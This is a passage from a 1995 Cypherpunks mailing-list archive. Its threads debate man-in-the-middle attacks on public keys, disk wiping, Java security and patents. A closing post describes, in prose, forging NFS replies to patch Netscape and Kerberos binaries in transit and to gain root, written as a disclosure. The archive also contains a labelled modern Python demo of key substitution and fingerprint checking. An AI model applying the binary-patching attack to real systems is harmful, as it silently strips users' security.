systems were recognized not long after those systems were proposed.  The
problems with fake keys have been discussed for over a decade.

Why is this all suddenly irrelevant?  Were these attacks never realistic?
Is it just not a problem somehow?  I am baffled by the fact that people
are just turning their backs on all these years of research and
experience.  If this is some kind of paradigm shift in which the idea of
communicating with keys is seen as the key to the puzzle, then I am
afraid I don't share the enlightenment.  To me the problem seems as real
as ever.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Pettitt <jpp@software.net>
Date: Mon, 9 Oct 95 12:10:23 PDT
To: tcmay@got.net
Subject: Patents etc
Message-ID: <Pine.3.89.9510091111.C30628-0100000@www2.software.net>
MIME-Version: 1.0
Content-Type: text/plain


Hmmmm the argument about hardware companies paying 10% to Intel 5% to the
capacitor folks does not stand up.  The reason is that hardware people do
*exactly* that and in return they receive the physical token (chip,
capacitor etc) that represents the intellectual property they just bought.

Patents in the hardware world can slow evolution just as much as in
software.  A good example is the "cats eye" patent in the UK.  Cats eyes
are the reflective studs in the road, until the original UK patent ran
out *nobody* did any work in the UK  to improve on the original design
because the royalty burden made it uneconomic.

What makes software different is the ability to freely copy it
without special hardware.  This lack of a physical token is what
causes all the problems.

IMHO What's needed is a) a good way of measuring usage and b) a realistic
attitude on the part of patent holders as to the value of their patents.

A good example of how not to do it is the current mess that governs the
music industry (which has very similar problems with copying and incorporation
of material [sampling] albeit in a context of copyright rather than
patents).

Ted Nelson did a lot of work on this for Xanadu and his ideas on
transcopyright are worth exploring further.

John Pettitt                                          jpp@software.net
VP Engineering, CyberSource Corp.       +1 415 473 3065 (V) (fax 3066)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Usuario Acceso2 <acceso2@diatel.upm.es>
Date: Mon, 9 Oct 95 04:13:28 PDT
To: cypherpunks@toad.com
Subject: Question on Galois Fields
Message-ID: <215*/S=acceso2/OU=diatel/O=upm/PRMD=iris/ADMD=mensatex/C=es/@MHS>
MIME-Version: 1.0
Content-Type: text/plain


Hi C'Punks.

Here's a rather mathematical question.

Can anyone explain or give an example of how to use arithmetic in GF(q^n)?

Often in cryptography we work in GF(p). I knew the existence of other fields,
like elliptic curves and so, but I found a short comment in Applied
Cryptography page 210 that I couldn't understand.

Thanks in advance for your help.

Jaime
acceso2@diatel.upm.es





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Mon, 9 Oct 95 10:15:43 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: Certificate proposal
In-Reply-To: <199510091558.IAA05131@ix6.ix.netcom.com>
Message-ID: <9510091715.AA27991@alpha>
MIME-Version: 1.0
Content-Type: text/plain



hfinney@shell.portal.com writes:
 > I can see using keys with attributes in this way, for credentials or as
 > other forms of authorization.  But what about for communications privacy?
 > What is the attribute that tells you that using this key will prevent
 > eavesdropping?

If we exchange keys on a face-to-face basis, then I really don't see
much of a MITM threat, unless somehow the MITM has perverted my
original key and I for some reason can't figure that out.  Now, as
long as you communicate with me via the public key I've handed you, we
should be as safe as PKE can make us.

If we are forced to exchange keys remotely, then perhaps some sort of
"proof" techniques could be used to establish to some level of
assurance that the remote entity I *think* is you is really you.  Or
you could provide me with a key, and then I could poll a list of
references to inquire as to the "goodness" of the key.  This seems to
me to be subtly different than a certificate procedure, because I'm
not asking about the goodness of a relationship to the key, but rather
about the key itself.

Maybe I'm missing something.  What is there to trust in a more
"traditional" certificate scheme?

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 9 Oct 95 09:24:11 PDT
To: cypherpunks@toad.com
Subject: Re: PC disk wipe software
Message-ID: <v02120d3bac9ef9fd157c@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>PC Tools has a wipe program that will either wipe individual files, or
>wipe all unallocated diskspace. It also allows you to choose the level
>of wipe (single overwrite, multiple, etc).

There has been considerable discussion on the MCIP list about how most
*Mac* programs that purport to do this, like Burn, for example, leave stuff
over in disk blocks. My understanding is that this is not a trivial
problem, and it occurs in MUSH-DOS as well....

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Mon, 9 Oct 95 12:31:33 PDT
To: hfinney@shell.portal.com (Hal)
Subject: Re: Certificate proposal
In-Reply-To: <199510091903.MAA22499@jobe.shell.portal.com>
Message-ID: <199510091926.MAA08047@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	In the situation you cite, Bob doesn't know Alice apart from
their email correspondence?

	In this case the ISP is acting as extension-of-alice. Bob
thinks he is talking to Alice but he is talking to ISP+Alice. What
difference does it make, if Bob has no knowledge of Alice outside
their email discussion, that Bob is talking to ISP+ Alice rather than
just alice. From Bob's perspective, Alice is really an alias for
ISP+Alice. (The same goes for Alice in the other direction.)

	In tim's words, from alice's point of view "Bob the key" ==
"BOB the person and Bob's ISP". From Bob's point of view "Alice the
key" == "Alice the person & Bob's ISP".

	The MITM attack only matters if there is a context outside the
email correspondence. (Say, perhaps, a drug deal which involves real
physical goods.) 

	More concretely, All I know of 'Hal' is through his emails. If
his ISP is intercepting the email between him and me, then my
definition of 'Hal' is 'Hal+ISP' -- it doesn't make a real difference
unless there is another context involved.

	(The MITM is still -important- though, because in most
situations there *is* some external context)



> 
> tcmay@got.net (Timothy C. May) writes:
> >For communication, the only credential Alice needs to ensure that only Bob
> >can read her message is that she uses Bob's public key. If "Bob the Key"
> >reads it, presumably it was "Bob the Person" who read it.
> 
> >(Again, Bob the Key = Bob the Person to many of us. If Bob the Person has
> >let his private key out, so that Chuck the Person is also able to read the
> >Bob the Key stuff, etc., then of course cryptography cannot really handle
> >this situation.)
> 
> OK, but again, what about the man in the middle attack?  Suppose the
> key that you found that claims to be from Bob is actually not his, but
> another one created by a man in the middle, such as Bob's malicious
> ISP?  Then that ISP is decrypting the messages Alice sends to him using
> that fake key, and re-encrypting them using Bob's real key.  He is
> reading all of the messages, and Alice and Bob do not in fact have
> communications privacy.
> 
> I don't want to overstate the risk of this attack.  It would not be an
> easy one to mount and I believe there are countermeasures which could
> detect it unless the MITM had nearly supernatural powers.  But the MITM
> attack is normally considered seriously in discussing crypto protocols.
> It is a well known weakness in Diffie-Hellman, for example.  That is why
> authenticated Diffie Hellman is used in some of the newly proposed key
> exchange protocols for IP.  The risks of MITM attacks on public key
> systems were recognized not long after those systems were proposed.  The
> problems with fake keys have been discussed for over a decade.
> 
> Why is this all suddenly irrelevant?  Were these attacks never realistic?
> Is it just not a problem somehow?  I am baffled by the fact that people
> are just turning their backs on all these years of research and
> experience.  If this is some kind of paradigm shift in which the idea of
> communicating with keys is seen as the key to the puzzle, then I am
> afraid I don't share the enlightenment.  To me the problem seems as real
> as ever.
> 
> Hal
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wolfgang Roeckelein <wolfgang@wi.WHU-Koblenz.de>
Date: Mon, 9 Oct 95 04:37:11 PDT
To: rjc@clark.net>
Subject: Re: (cpx) Netscape 2.0 beta
In-Reply-To: <v02120d12ac9db2d1ea18@[199.0.65.105]>
Message-ID: <9510091129.AA01630@sirius.wi.WHU-Koblenz.de>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

>  The good news is that someone finally, after years, has implemented
>Progressive JPEG (I've been yelling about it for a while myself), and
>it is simply *light years* better than interlaced GIFs.

How do I create Progressive JPEG pictures?

Note to Cypherpunks: Please answer via email, I receive only selected  
material from your list!

Thank you very much in advance,
  Wolfgang
---
Dipl.-Wirtsch.-Inf.	Voice:	+49 261 6509 173
Wolfgang Roeckelein	Fax:	+49 261 6509 179
WHU Koblenz		E-Mail:	roeckelein@wi.whu-koblenz.de
Burgplatz 2			(MIME and NeXTmail ok)
D-56179 Vallendar	WWW:	http://www.whu-koblenz.de/~wolfgang/
Germany
GCM/B d-- s: a- C++ US+++$ UX+++ P+ L E? W++ N++ w-- O-(++) M+ !V PS++ PE Y+  
PGP(++) t+ 5? X? R+ tv b++ DI D++ G e+++>++++ h+ r++>% y? (Geek Code V3.x)
--rsa--------------------------------8<-------------------------------------
#!/usr/local/bin/perl -s-- -export-a-crypto-system-sig -RSA-in-3-lines-PERL
($k,$n)=@ARGV;$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%
Sa2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print pack('H*'
,$_)while read(STDIN,$m,($w=2*$d-1+length($n||die"$0 [-d] k n\n")&~1)/2)
-------------------------------------8<-------------------------------------
TRY: echo squeamish ossifrage | rsa -e 3 7537d365 | rsa -d 4e243e33 7537d365
Residents of the USA & France *MUST NOT* include this .sig if following up!
*** Residents of France & Russia *MUST NOT* make any use of this -sig !  ***




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 9 Oct 95 12:21:57 PDT
To: cypherpunks@toad.com
Subject: Re: PC wipe utilities
Message-ID: <ac9ec30f04021004c1ed@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:52 PM 10/9/95, Brian D Williams wrote:

>Alan Penny's  excellent freeware utility wipe.zip has been
>uuencoded and sent to you. I believe it fulfills your requirements.
>
> As recently as the last issue of WIRED an article by a data
>recovery company claimed they could recover data that had been
>overwritten nine times...... make it a bakers dozen to be safe.

Better yet, wipe the disk/diskette on _more than one_ machine. It should be
easy to just run the wipe on, say, 3 machines, 3 to 5 times each.

A lot of the ability to recover putatively erased media lies in the fact
that a given set of read-write heads has characteristics (especially with
regard to positioning) that make repeated erase passes less than fully
effective. The remnants of the recorded signal can be extracted with
careful analysis of the analog signal (especially from special read heads).

Using N erase machines increases the "jitter" to some extent.

My hunch is that it would make the recovery process exponentially (in N)
more difficult. But I have no lab experience in this, so this is just an
idea.

But crunching the media is a faster (and maybe cheaper) approach.


--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Mon, 9 Oct 95 09:53:48 PDT
To: hfinney@shell.portal.com
Subject: Re: Certificate proposal
In-Reply-To: <199510061922.MAA06669@comsec.com>
Message-ID: <9510091651.AA26787@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Thu, 5 Oct 1995 21:40:04 -0700
>From: Hal <hfinney@shell.portal.com>

>I don't really care whether the name is called an attribute, a
>distinguished name, or an ooblek.  I just don't see how you're going to
>get along without it.  The fact is, we live in a world populated by
>people and companies and we use names to identify them.  I will grant
>that there are problems with uniqueness but I don't think the solution
>can be to just give up on the whole idea of names since they are so
>messy.  

We're not talking about giving up on names.

You have lots of names for things -- some of them are even nicknames, known
only to you.

For any certification scheme, you also need a unique name.

If you happen to use the public key as that unique name, you have the
proposal we're talking about.  It has an advantage -- that you don't
have to certify the binding between the unique name and the key.
That's built in.

 -Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMHlSzVQXJENzYr45AQFYvgP+O12CvK058nWvhvq48QIqIBo8N5jU6uqN
8kFagz2iKPLcv+cLJ7AiFiOAU3mY5CiWkU0pK6z9YlNgB7d5SNqyzpAL8jIe6zgI
xD5hAesL6Pz85f8OLAn9teoydW9k3QzBekOeT0xCKkIj8+8KUDM7nrUMl2t08bTr
OG53eFdFD6o=
=d7lq
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Mon, 9 Oct 95 10:03:30 PDT
To: cypherpunks@toad.com
Subject: Re: Crypto's Role in Evil?
Message-ID: <199510091701.NAA18171@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <9510090412.AA02181@pulm1.accessone.com>, blancw@accessone.com wrote:

> Another thought is that as people become more separated into individual 
> self-reliance, they must develop other ideas, organizations, or means by
> which they may defend themselves from abuse.  That is, if they cannot rely on
> governments (as they come to realize that governments don't make much 
> difference in terms of salvation), then individuals must become more 
> imaginative over how they can defend themselves against those who are not so 
> conscientious in upholding a sense of personal honor & moral rectitude.

Correct, Blanc. That's why I am saving my pennies to buy an AR-15. I know
the government of the near future will not be in a position to stand in
the way of my involuntary participation in organ transplant experiments.
It will be up to the individual and voluntary neighborhood associations,
etc. to provide our personal security.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMHlVXCoZzwIn1bdtAQFkawF8DBRY8Nxeqkld5Ltw1J6VTqm+5JtN2sNZ
PPCOCt7Gl1NKQmkJPlWBC5TY4cgtMrc0
=0pt6
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Mon, 9 Oct 95 13:40:11 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
In-Reply-To: <199510091926.MAA08047@infinity.c2.org>
Message-ID: <199510092038.NAA09612@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


sameer <sameer@c2.org> writes:

>	In the situation you cite, Bob doesn't know Alice apart from
>their email correspondence?

Right.  My goal is to have a system in which two individuals who have
never met can communicate securely.  This is not too radical a notion, I
trust.  In fact, I would go so far as to say that to a considerable
extent it is the whole point of public key cryptography.

>	In this case the ISP is acting as extension-of-alice. Bob
>thinks he is talking to Alice but he is talking to ISP+Alice. What
>difference does it make, if Bob has no knowledge of Alice outside
>their email discussion, that Bob is talking to ISP+ Alice rather than
>just alice. From Bob's perspective, Alice is really an alias for
>ISP+Alice. (The same goes for Alice in the other direction.)

What difference does it make?  I'll tell you.  It means that their
conversation is not private!  It means that their cryptography is
useless, that it has failed.  It means they have an unsecure channel.  I
don't know how I can put it more plainly than this.  I wrote a long
article a few days ago arguing that they almost might as well not use
cryptography if they're going to adopt this stance.  Let anyone
eavesdrop, and from Bob's point of view when he thinks he is talking to
Alice he is actually talking to eavesdroppers+Alice.  From his point of
view, Alice is just an alias for eavesdroppers+Alice.  Etc., etc.

>	In tim's words, from alice's point of view "Bob the key" ==
>"BOB the person and Bob's ISP". From Bob's point of view "Alice the
>key" == "Alice the person & Bob's ISP".

This is not a useful or appropriate way to think of the world, IMO.  If
you do this, then from your perspective people become bafflingly
unreliable.  I wrote all about this before.

>	The MITM attack only matters if there is a context outside the
>email correspondence. (Say, perhaps, a drug deal which involves real
>physical goods.) 

Try to think of it not in relativistic or epistemological terms, but
rather look at it in terms of reality.  The real world exists, and in it
exist real people.  We can agree on this much, right?  Two of these
people want to communicate securely.  That is not such a stretch of the
imagination, is it?  By "communicate securely" I mean they exchange
information in such a way that other people don't receive it.

Now surely it is clear that with this definition of the problem,
approaches which redefine people to mean people+eavesdroppers are not
responsive.  Perhaps the motivation to do so is simply the belief that
the problem is not solvable as stated.  If so, I'd like to hear someone
say this.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Mon, 9 Oct 95 13:55:12 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
In-Reply-To: <ac9ea8f3010210049f44@[205.199.118.202]>
Message-ID: <199510092054.NAA12060@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


m5@dev.tivoli.com (Mike McNally) writes:

>You have several alternative means of verifying the key:

>1) You can meet Bob at a local Pizza Hut and verify the key in person.

>2) You can go through a variety of channels to a variety of other
>trusted entities and verify with them that they're using the same key
>for Bob.

>3) You can set up some sorts of communications tests to "probe" for a
>MITM situation, perhaps by passing through "seeded" information (data
>taggants?).

I will agree that there are alternatives to certificates.  I alluded to
this in the part of my message which you elided below, about defeating
MITM attacks via various techniques.  However, it may not be as easy to
automate these tests as to automate a certificate check, and in
particular the more automated the tests become the more plausible it
would be that the MITM could recognize and defeat a standard test.

> > I don't want to overstate the risk of this attack.  It would not be an
> > easy one to mount ... The risks of MITM attacks on public key
> > systems were recognized not long after those systems were proposed.  The
> > problems with fake keys have been discussed for over a decade.
> >
> > Why is this all suddenly irrelevant?  

>I don't think it is irrelevant, I just think it's orthogonal to the
>issue of whether a certificate for a key<-->entity relationship is
>considered to be the key or an adjunct to the key.  I could be wrong,
>of course.

The POV I am really arguing against is the one that defines identity to
be a key, that states that in communicating with a key you are by
definition communicating with the person you have in mind.  The man in
the middle attack does not exist because from your point of view the
entity at the other end of the communication channel is just the MITM
plus the person you think you are talking to.  This idea has been
expressed many times by other people in this discussion, and it is this
which I think is fundamentally flawed and even dangerous because it
encourages the use of untested keys.  In fact it seems to define away
the question of whether a key is real or fake.

Hal
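
[Added illustration, not part of any poster's message: the key-substitution scenario Hal describes earlier in this thread, together with the cross-checking alternatives quoted above from Mike McNally. It uses toy RSA over constructed Mersenne-prime moduli; the names BOB, MITM, deliver, verify_key and the channel labels are assumptions made for the example.]

```python
import hashlib

E = 65537  # public exponent used for both constructed keys


def make_key(p, q):
    """Toy RSA key pair from two known primes. Far too small for real use."""
    n = p * q
    return {"pub": (n, E), "priv": (n, pow(E, -1, (p - 1) * (q - 1)))}


def encrypt(pub, text):
    n, e = pub
    m = int.from_bytes(text.encode(), "big")
    if m >= n:
        raise ValueError("message too long for the toy modulus")
    return pow(m, e, n)


def decrypt(priv, c):
    n, d = priv
    m = pow(c, d, n)
    return m.to_bytes((m.bit_length() + 7) // 8, "big").decode()


def fingerprint(pub):
    """Short digest of a public key: the value people compare out of band."""
    n, e = pub
    return hashlib.sha256(f"{n:x}:{e:x}".encode()).hexdigest()[:16]


# Constructed keys. Mersenne primes are used only because they are known primes.
BOB = make_key(2**89 - 1, 2**107 - 1)    # Bob's real key
MITM = make_key(2**61 - 1, 2**127 - 1)   # key created by the party in the middle

MSG = "noon, usual place"                # constructed sample message


def deliver(text, key_alice_holds):
    """Carry one message from Alice to Bob and report what each party reads.

    If Alice holds the substitute key, the party in the middle decrypts with
    its own private key and re-encrypts under Bob's real key, as in Hal's
    description. Bob's decryption succeeds either way.
    """
    c = encrypt(key_alice_holds, text)
    middle_reads = None
    if key_alice_holds == MITM["pub"]:
        middle_reads = decrypt(MITM["priv"], c)
        c = encrypt(BOB["pub"], middle_reads)
    return {"bob_reads": decrypt(BOB["priv"], c), "middle_reads": middle_reads}


# Fingerprints Alice collects over channels assumed not to cross the same
# intermediary (McNally's options 1 and 2). Channel labels are hypothetical.
REPORTS = {
    "in person": fingerprint(BOB["pub"]),
    "second keyserver": fingerprint(BOB["pub"]),
    "mutual contact": fingerprint(BOB["pub"]),
}


def verify_key(key_alice_holds, reports):
    """Return the channels whose reported fingerprint disagrees with the held key."""
    held = fingerprint(key_alice_holds)
    return [channel for channel, fp in reports.items() if fp != held]


if __name__ == "__main__":
    for label, key in (("genuine key", BOB["pub"]), ("substituted key", MITM["pub"])):
        print(label, deliver(MSG, key), "disagreeing channels:", verify_key(key, REPORTS))
```

In both runs Bob reads the message intact, so a successful decryption at his end says nothing about privacy; only the fingerprint comparison over independent channels separates the two cases.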




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@panix.com
Date: Mon, 9 Oct 95 10:59:21 PDT
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: PC disk wipe software
In-Reply-To: <199510091318.JAA24166@jekyll.piermont.com>
Message-ID: <Pine.SUN.3.91.951009135607.26382B-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 9 Oct 1995, Perry E. Metzger wrote:

> I thought I'd ask here, since it's related to a lot of the stuff people
> have written for the PC platform in these parts. I need to securely
> wipe a bunch of data from an MS-DOS hard drive, so that it can't be
> recovered. Are there any readily available utilities for this? Will
> any of them selectively erase only data that isn't allocated to
> existing files?
> 
> Perry

Norton Utilities has been able to do this for a long time.  I think
the program is called <wipedisk> (wipe "unused" area of a disk), and I
believe there's also a <wipefile> that will obliterate a file.  These
things are supposed to conform to some unspecified "government
guidelines," so you decide how good they are.  My guess is that
they're plenty good enough.

   --D.

--
Dave Mandl
dmandl@panix.com
http://wfmu.org/~davem




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 9 Oct 95 14:13:21 PDT
To: Rich Salz <rsalz@osf.org>
Subject: Re: netscape mail starts java attachments upon get new mail...
In-Reply-To: <9510091958.AA23589@sulphur.osf.org>
Message-ID: <Pine.SOL.3.91.951009141337.13562D-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 9 Oct 1995, Rich Salz wrote:

> >As far as I know Java apps can only make network connections to the
> >IP address they were loaded from.
> 
> What part of the state of my machine can they access and send out
> to the "home port"?  Can they read /etc/passwd, make NIS requests,
> etc?

Java applets can't read /etc/passwd, and can't issue NIS requests unless 
they were downloaded from an HTTP server running on the NIS server 
(actually, they can't do UDP at the moment, so that's out as well)

Simon





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 9 Oct 95 14:56:43 PDT
To: cypherpunks@toad.com
Subject: java security & the cypherpunk agenda
Message-ID: <199510092126.OAA11086@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



once again I will offer a contrary view, and once again to PM. 
PM predicts that serious (unfixable?) bugs will be found in Java on 
the level of what was recently identified in Netscape. I disagree.

I am not intimately familiar with Java (nor, obviously, is PM), but I 
know Java was designed from the ground up to be secure on every platform
it is running on. in contrast to most OSes, the whole theory of Java
is based on creating a totally secure, unbreakable programming 
environment. most OSes start out with the idea, "what is an application?
how does the OS handle it? how does the OS permit file I/O etc.?"
Java starts out with the idea, "what operations can be allowed without
compromising security but still allowing algorithms"?

the software will succeed or fail in its aims on how
well it accomplishes the criteria of unbreakable security.. 
I suspect it is eventually going to be considered more secure than 
many OS's out there that it runs on (even unix). (and Java may eventually
evolve to become an integral part of future OS security apparatuses).

one thing that people don't seem to realize: Java was clearly engineered
to be a language that would allow "cycle sales" over cyberspace. in 
other words, how can companies lease out unused cycles to the world
just like power companies sell off their extra watt-hours to adjacent
cities? a secure language is the critical piece, and the Java designers
were clearly aiming for this remarkable and commendable accomplishment.
someday, even conservative companies such as IBM may agree that the 
security of Java is so great (and so widely well-proven as rock solid)
that they will lease out their unused, nighttime CPU cycles to 
Java applications and interested buyers, because they can be sure
that there is just no way to sabotage a system no matter how ingenious
you are..

PM tends to suggest that any language or computing environment
with a certain degree of complexity simply cannot be made secure.
I generally agree with this. however I suspect that Java is beneath
this complexity cutoff.

I do agree with other cypherpunks however that focusing cpunk attentions
on breaking Java is a highly worthwhile activity. Java is an extremely
promising development and I fully suspect it will become something
of the first widespread "cyberspatial programming language". in
another message I talked about how companies such as Netscape may
not become so security conscious themselves but work with other
companies who are security paranoid and try to successfully integrate
their applications. Java is the prime candidate for this. and I am 
willing to bet the Java engineers have seen every security trick in the 
book (many I suspect perhaps even PM in his own paranoia and obsession is not
aware of) and can demonstrate how Java, at least if implemented bug-free,
defeats *all* of them and can virtually be proven secure.

now, that little catchword "bug-free" I put in the last sentence is
something that everyone here can jump on. "it might be possible to 
create a secure language *in*theory*" say the naysayers, "but in 
practice it will always have bugs that can break it." well, I think
if anything will go beyond this weakness, Java has the best chance.
and the above argument sounds suspiciously like, "no software can really
accomplish exactly what it sets out to, because it will have bugs".
sure, Word and Excel both have bugs, but they do not defeat the primary
design. and this argument, "you cannot implement perfect software" is
more of a complaint against human psychology than against a group who
is trying to implement a theoretically secure programming environment.
(perhaps they should use the qualification, "java is the first secure
programming language, in theory; in practice YMMV <g>").

I think we should be careful to make this distinction. there is
a lot of software that is not even theoretically secure, and there
is some software that tries to be secure but is not due to implementation
difficulties. the latter should not really be our concern so much.
we are not here to try to prevent programming errors (i.e., not 
correctly translating a correct design into code) so much as to 
try to get companies to write software, that if written properly,
is secure. (it seems to me this is the logical first step, and then
the next step is trying to break the code that seeks to be secure
and flame the eyebrows off its designers, as has been done here
recently <g>, but unless one first has a good hammer, one does not
care about faulty nails..)

I was talking to a press reporter and he asked if the cpunks had gone
into some sort of new phase in which they were becoming something
like the policemen of cyberspace. I said that they had not really changed
in their goals much at all, it's more that the software that cpunks
have fantasized about for years is now starting to materialize, and there
is now something concrete to focus energies on. Netscape is a good 
example, and Java is another example. I think if I had talked about
Java a few years ago on this list, and about who invented it (Sun),
what it was designed to do, etc., people here would be delirious with
excitement. instead, there is a bit of cynicism here that is a bit
surprising to me. if there ever was a "cpunk language" that seeks to achieve
widespread, home-grown, secure algorithms in cyberspace, I would consider 
this the closest.

I highly recommend cpunks pay close attention to Java and help in its 
development, because imho it really has been conceived largely with key
cpunk agenda items as basic design criteria.
I suspect it is going to become a very strong standard and eventually
recognized as one of the most secure pieces of software ever designed, 
at least in regards to theoretical capabilities.

--Vlad Nuri





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gauthier@espresso.CS.Berkeley.EDU (Paul_A Gauthier)
Date: Mon, 9 Oct 95 14:29:31 PDT
To: bugtraq@crimelab.com
Subject: Basic Flaws in Internet Security and Commerce
Message-ID: <9510092126.AA22117@espresso.CS.Berkeley.EDU.mammoth>
MIME-Version: 1.0
Content-Type: text/plain



Basic Flaws in Internet Security and Commerce

We believe that the current focus on secure session-layer protocols and
sufficient randomness has obscured more fundamental flaws in end-to-end
security. In particular, secure end-to-end transactions require two parts: a
secure protocol to communicate over untrusted channels, and trusted code at
both endpoints. The latter problem has received less attention, but destroys
security regardless of the quality of the protocols or of the random numbers.

We have implemented a series of related attacks utilizing IP spoofing:

   *  We can spoof NFS to patch binaries on the fly if we are on any subnet
     between the NFS client and NFS server. We used this to turn legitimate
     Netscape browsers into versions that used a fixed key (known only to us),
     thus invisibly eliminating security.
   *  The same trick allows us to defeat Kerberos security by attacking kinit.
   *  We can also spoof NFS file-handle lookups, so that we can replace any
     file (such as .login) with another file that runs with root access
     privileges (even if the requesting user cannot).

These work because the trusted path to executables is really not trustworthy in
most environments. Although we use on-the-wire patching to compromise
executables, the client binaries can also be compromised during download, by
on-the-wire patching of FTP or HTTP transfers. Trojan horses and viruses could
also patch the client software after it's on the local disk, especially on
systems like Windows 95 that do not provide access control for files.

Given that these are realistic threats, we believe that these issues must be
resolved before internet security and commerce are realistic.

-------------------------------------------------------------------------------

We began to consider in more detail some fundamental weaknesses of common
network security practices that would lead to trivial further attacks on
Netscape as well as many other security tools like Kerberos. It was our goal to
demonstrate that it is trivially possible to patch executables on-the-wire to
completely compromise their security.

In doing so, we hope to reinforce the point that security is an end-to-end
problem that is far harder than getting the protocols correct. Strong, correct
protocols only make more subtle endpoint attacks more likely, especially in
light of the potential for financial gain as the amount of commerce on the
Internet increases. Most of the attacks we discuss are suitable for the
systematic exploitation of large groups of users: an entire organization, or
even a large fraction of the user base of a particular piece of software.

In many computing environments a pool of common executables, like the Netscape
binary, are provided to clients by a fileserver. In such systems, including
NFS, AFS and Windows NT, there is no authentication of the file contents sent
between clients and servers.

In these systems there are provisions for sophisticated access checks to
determine file permissions, at open or handle lookup time. But the file
contents that are read from the server are not authenticated in any secure way.
The client has no way to determine if the bytes are indeed being sent by the
server.

Our first attack model is one in which the attacker has (promiscuous) network
access to any machine on any ethernet subnet between the fileserver and the
clients under attack. In under a day we produced software that can exploit the
lack of authentication in NFS to patch the object code of any executable
on-the-wire as it travels between the NFS server and the client machine.

The technical details of the attack are rather simple. To retrieve data from
the NFS server a client sends a short request message detailing which block
from the file it is interested in (where a block is a range of bytes). The
attack software is located on an ethernet segment between the client and the
NFS server, so is able to snoop this traffic.

The attack software snoops, waiting for any request for a particular block of a
particular executable; for example, the block containing the session-key
generation code in the Netscape executable. It is then able to forge a reply
from the NFS server and transmit it to the client. If the forged packet reaches
the client before the legitimate reply, it is accepted and the legitimate reply
is discarded as a duplicate.

There is obviously a race condition between the injection of the forged
response and the true response. Since the attacking software is focused solely
